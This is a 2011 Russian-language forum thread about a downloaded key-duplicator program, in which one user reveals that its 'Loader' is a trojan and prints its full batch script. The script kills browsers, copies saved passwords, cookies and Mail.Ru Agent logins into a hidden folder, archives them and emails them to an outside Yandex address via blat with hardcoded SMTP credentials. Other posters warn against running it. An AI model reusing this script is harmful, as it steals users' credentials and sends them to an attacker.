Дубль 73

[Goha 75]

привет всем вот нарыл ссылку мож кто в теме двоилка м73

Изменено 11 мая, 2011 пользователем MEG-2

[viro]

Ключик не открывается.

[kai-777]

привет всем вот нарыл ссылку мож кто в теме двоилка м73 http://depositfiles.com/ru/files/8n8ed4f01

 

А ты сам пробовал прога не работает

[Goha 75]

А ты сам пробовал прога не работает

ВОТ смотри рно как снею работать увы не вьеду

[ekonstantin]

Файл Loader при просмотре очень похож на трояна.

Ага, он и есть :)

Создает файл C:\WINDOWS\Prefetch\Blat.exe

Также там присутствуют строки

 

taskkill /f /im opera.exe

taskkill /f /im firefox.exe

taskkill /f /im chrome.exe

taskkill /f /im iexplore.exe

taskkill /f /im magent.exe

 

md C:\pass\

copy /y "blat.dll" "%SystemRoot%\blat.dll"

copy /y "blat.exe" "%SystemRoot%\blat.exe"

copy /y "blat.lib" "%SystemRoot%\blat.lib"

copy /y "Rar.exe" "%SystemRoot%\Rar.exe"

attrib C:\pass +h +s +a +r

md C:\pass\opera\

CD /D %APPDATA%\Opera\Opera\

copy wand.dat C:\pass\opera\ >nul

copy cookies4.dat C:\pass\opera\ >nul

md C:\pass\MailAgent\reg

regedit.exe -ea C:\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2

regedit.exe -ea C:\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3

CD /D %APPDATA%

Xcopy Mra\Base C:\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul

Xcopy Mra\Update\ver.txt C:\pass\MailAgent /K /H /G /Q /R /S /Y >nul

md C:\pass\Mozilla\

cd %AppData%\Mozilla\Firefox\Profiles\*.default\

copy cookies.sqlite C:\pass\Mozilla\ >nul

copy key3.db C:\pass\Mozilla\ >nul

copy signons.sqlite C:\pass\Mozilla\ >nul

md C:\pass\Google\

cd %userprofile%\Local Settings\Application Data\Google\Chrome\User Data\Default\

copy /y Login* C:\pass\Google\ >nul

copy /y Web Data* C:\pass\Google\ >nul

copy /y Cookies* C:\pass\Google\ >nul

copy /y %Windir%\Rar.exe C:\pass\ >nul

C:\pass\rar.exe a -r C:\pass\pass.rar C:\pass\

copy /y %Windir%\blat.dll C:\pass\

copy /y %Windir%\blat.exe C:\pass\

copy /y %Windir%\blat.lib C:\pass\

del /s /q %SystemRoot%\Rar.exe

del /s /q %SystemRoot%\blat.dll

del /s /q %SystemRoot%\blat.exe

del /s /q %SystemRoot%\blat.lib

cd C:\pass\

blat.exe -install -server smtp.yandex.ru -port 587 -f sender.qq@yandex.ru -u sender.qq -pw qazxsw1213

ren *.rar pass.rar

blat.exe -body surpriz -to fj0001@yandex.ru -attach pass.rar

cd %Windir%

rmdir /s /q C:\pass

EXIT

Изменено 9 мая, 2011 пользователем ekonstantin

[Борис Р]

ВОТ смотри рно как снею работать увы не вьеду

как запустить программу

[Nemec]

на самом деле ничего вы не запустите, а вот Loader собирает пароли из браузеров и пытается куда-то отправить.

автору башку открутить за это надо

[magelan1]

Купите у автора (Dik) за 100 уе и не парьтесь, отобьется на нескольких машинах ,и все таки поддержка есть , а если кому нужно слепить двойную , стучитесь в личку.

Изменено 12 мая, 2011 пользователем magelan1

[v vovanshu]

Подтверждаю, после запуска лоайдера, сразу создается соединение и начинает ломиться в инет, авира это очень хорошо видит. Так, что не запускайте файл. А автора в бан пожизненный.

[fcctuning]

Всегда говорил Халява хорошей не бывает